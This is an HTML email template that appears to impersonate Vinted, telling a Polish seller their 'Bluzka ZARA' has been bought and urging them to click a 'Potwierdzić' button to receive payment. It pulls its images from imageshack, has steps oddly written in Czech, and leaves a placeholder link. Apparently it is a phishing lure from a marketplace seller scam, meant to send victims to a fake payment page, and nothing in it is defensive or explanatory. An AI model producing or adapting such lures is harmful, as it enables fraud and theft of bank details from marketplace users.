<!DOCTYPE HTML>
<html>
	<head>
		<meta charset="UTF-8">
		<style>
			.all {
				width: 654px;
				height: 1000px;
				background-color: black;
				margin: 0 auto;
			}
			
			.logo{
				background-color: white;
				width: 654;
				height: 73;
			}
			
			#toplogo {
				margin-top: 19px;
				margin-left: 287px;
				margin-bottom: 19px;
			}
			
			.zalivka {
				background-color: #056f74;
				height: 49px;
				width: 654px;
			}
			
			.text1 {
				width: 654px;
				height: 56px;
				text-align: center;
				background-color: #056f74;
				font-size: 34px;
				font-family: Arial;
				color: white;
				vertical-align: middle;
				display:table-cell; 
			}
			
			.text2 {
				height: 54px;
				width: 654px;
				text-align: center;
				background-color: #056f74;
				color: white;
				font-family: Arial;
				font-size: 16px;
			}
			
			.rvan {
				height: 105px;
				width: 654px;
				background-color: #056f74;
				vertical-align: bottom;
				display:table-cell;
				padding-bottom:0px;
				margin-bottom:0px;
			}
			
			#rvantop {
				position:relative;
				margin-bottom:-10px;
			}
			
			.textbottom {
				height: 167px;
				width: 654px;
				font-family: Arial;
				text-align: center;
				background-color: white;
			}
			
			#textinside {
				font-size: 27px;
				padding-top: 38px;
				color: #313030;
			}
			
			#box {
				margin-top: 50px;
			}
			
			#textinside2 {
				font-size: 16px;
				padding-top: 22px;
				color: #313030;
			}
			
			#NoteArt {
				margin-top: 10px;
			}
			
			#ShirtArt {
				margin-top: 21px;
			}
			
			.button {
				height: 50px;
				width: 654px;
				background-color: white;
			}
			
			#button2 {
				height: 35px;
				width: 186px;
				background-color: #00a2ad;
				border-radius: 5px;
				text-align: center;
				font-family: Arial;
				font-size: 14px;
				margin:0 auto;
			}
			
			#button3 {
				padding-top: 9px;
				color: white;
			}
			
			.imgbottom {
				height: 150px;
				width: 654px;
				background-color: white;
			}
			
			#MoneyArt {
				margin-top: -5px;
				margin-left: 40px;
			}
			
			#SaleArt {
				margin-right: 100px;
				margin-top: -40px;
			}
			
			.downtext {
				font-family: Arial;
				font-size: 16px;
				color: #b5b5b5;
				margin-top: 20px;
				margin-left: 38px;
			}
			
			.rvan2 {
				background-color: white;
				vertical-align: bottom;
				display:table-cell;
				padding-bottom:0px;
				margin-bottom:0px;
			}
			
			#rvanbottom {
				position:relative;
				margin-bottom:-5px;
			}

			.podval {
				width: 654px;
				height: 350px;
				background-color: #f5f6f8;
				text-align: center;
			}
			
			.textpodval1 {
				font-family: Arial;
				font-size: 16px;
				color: #b5b5b5;
				margin-top: 34px;
			}
			
			.imgpodval {
				margin-top: 25px;
				background-color: #f5f6f8;
			}
			
			#img1 {
				margin-right: 25px;
			}
			
			#img2 {
				margin-right: 25px;
			}
			
			.textpodval2 {
				font-family: Arial;
				font-size: 16px;
				color: #7e7f7f;
				margin-top: 40px;
				margin-bottom: 35px;
			}

			.textpodval3 {
				font-family: Arial;
				font-size: 9px;
				color: #7e7f7f;
				text-align: left;
				margin-left: 70px;
				margin-top: 15px;
			}
			
			a {
				text-decoration: none;
			}
				
		</style>
	</head>
	<body>
		<div class="all">
			<div class="logo"><img src="https://imageshack.com/i/pmfPHosap" id="toplogo"></div>
			<div class="zalivka"></div>
			<div class="text1">
				<b>Twój przedmiot został zakupiony!</b>
			</div>
			<div class="text2">
				<img src="https://imageshack.com/i/pmOVhUV5p">
				Witam! Twój produkt "Bluzka ZARA" został kupiony w Vinted!<br>
				Proszę potwierdzić sprzedaż. 
			</div>
			<div class="rvan">
				<div id="rvantop"><img src="https://imageshack.com/i/pnkXC9mVp"></div>
			</div>
			<div class="textbottom">
				<img src="https://imageshack.com/i/pm05NXe6p" id="NoteArt" align="left">
				<img src="https://imageshack.com/i/pnj8C6mCp" id="ShirtArt" align="right">
				<div id="textinside"><img src="https://imageshack.com/i/poE5NhRWp"> <b>Jak to działa?</b></div>
				<div id="textinside2">
					<b>1. Kupující za zboží zaplatil, čeká na prodávajícího!<br>
					2. Kliknutím na "Potwierdzić" obdržíte finanční prostředky..<br>
					3. Potvrzení banky a přijetí finančních prostředků!</b><br>
				</div>
			</div>
			<div class="button">

				<a href="#"><div id="button2"><div id="button3"><b>Potwierdzić</b></div></div></a>
			</div>
			<div class="imgbottom">
				<img src="https://imageshack.com/i/pnlFjgUTp" id="MoneyArt">
				<img src="https://imageshack.com/i/poMKjBF5p" align="right" id="SaleArt">
				<div class="downtext">
					Pozdravy,<br>
					Team Vinted
				</div>
			</div>
			<div class="rvan2">
				<img src="https://imageshack.com/i/pnI0MeaVp" id="rvanbottom">
			</div>
			<div class="podval">
				<div class="line1"><img src="https://imageshack.com/i/pohgxO0hp"></div>
				<div class="textpodval1">Znajdź Nas</div>
				<div class="imgpodval">
					<a href="#"><img src="https://imageshack.com/i/pl93T6QNp" id="img1"></a>
					<a href="#"><img src="https://imageshack.com/i/po3oCnYMp" id="img2"></a>
					<a href="#"><img src="https://imageshack.com/i/pnJzknsKp" id="img3"></a>
				</div>
				<div class="textpodval2">Rezygnacja z newslettera | Pomoc</div>
				<div class="line2"><img src="https://imageshack.com/i/plBLw7g5p"></div>
				<div class="textpodval3">
					Vinted wykorzystuje Twoje dane osobowe (nazwa użytkownika, adres e-mail. adres pocztowy, ustawienia, historia zakupów) celów<br> 
					marketingu bezpośredniego. Jeśli nie chcesz otrzymywać naszych e-maili marketingowych.wiadomości e-mail, przejdź do<br>
					"Moje Ustawienia", wybierz "Wiadomości" i kliknij "Сhcę zrezygnować z newslettera". Aby dowiedzieć się więcej o innych funkcjach<br>
					serwisu oraz o tym, jak wykorzystujemy Twoje dane osobowe, zapoznaj się z naszą Polityką Prywatności.
				</div>
			</div>
		</div>
	</body>
</html>